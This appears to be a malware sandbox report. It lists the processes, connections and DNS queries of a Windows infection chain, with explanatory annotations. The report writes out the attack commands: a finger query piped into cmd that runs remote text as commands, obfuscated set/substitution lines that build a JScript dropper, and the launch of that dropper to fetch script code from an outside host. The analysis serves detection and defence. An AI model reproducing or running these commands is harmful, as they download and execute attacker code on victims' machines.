Technical Information
- '<SYSTEM32>\finger.exe' ok@4rhrr1eeoxc.alilotas.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\xgz.js"
- %LOCALAPPDATA%\xgz.js
  (file written to disk; this is the script that the wscript.exe command above runs)
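- '4r######oxc.alilotas.buzz':79
  (port 79 is the Finger service port; the masked name appears to be the host queried by finger.exe above)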
- 'ne#####a7h.belinado.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '4r######oxc.alilotas.buzz':79
- 'cl###flare.com':443
- DNS ASK 4r######oxc.alilotas.buzz
- DNS ASK ne#####a7h.belinado.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
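- '<SYSTEM32>\cmd.exe' /c finger ok@4rhrr1eeoxc.alilotas.buzz |more +2 |cmd
  (the Finger reply, minus its first two lines, is piped into cmd, so text returned by the remote host is executed as commands)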
- '<SYSTEM32>\cmd.exe'
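- '<SYSTEM32>\cmd.exe' /V/D/c "SEt ISNX=.j&&SEt MWCXA=vFwCDarFwCD a =FwCD 'scFwCDriFwCDptFwCD:'; b =FwCD 'hFwCDTtPFwCD:'; GFwCDetFwCDObjFwCDecFwCDt(FwCDa+b+'&&sET 5R9V=VJQAAVJQAAne9gu2va7h.belinado.xyzVJQAA?1VJQAA')&...
  (command line is truncated in the report; with the filler token FwCD removed, the MWCXA value reads as JScript that joins 'script:' and 'hTtP:' and passes the result to GetObject)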
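- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p QQRKG="%MWCXA:FwCD=%%5R9V:VJQAA=/%" 0<nul 1>%LOCALAPPDATA%\xgz%ISNX%s"
  (the %VAR:token=% substitutions strip FwCD from MWCXA and turn VJQAA into "/" in 5R9V; set/p prints the rebuilt string, which is redirected into %LOCALAPPDATA%\xgz.js, with ISNX supplying the ".j" of the extension)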
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\xgz%ISNX%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\xgz.js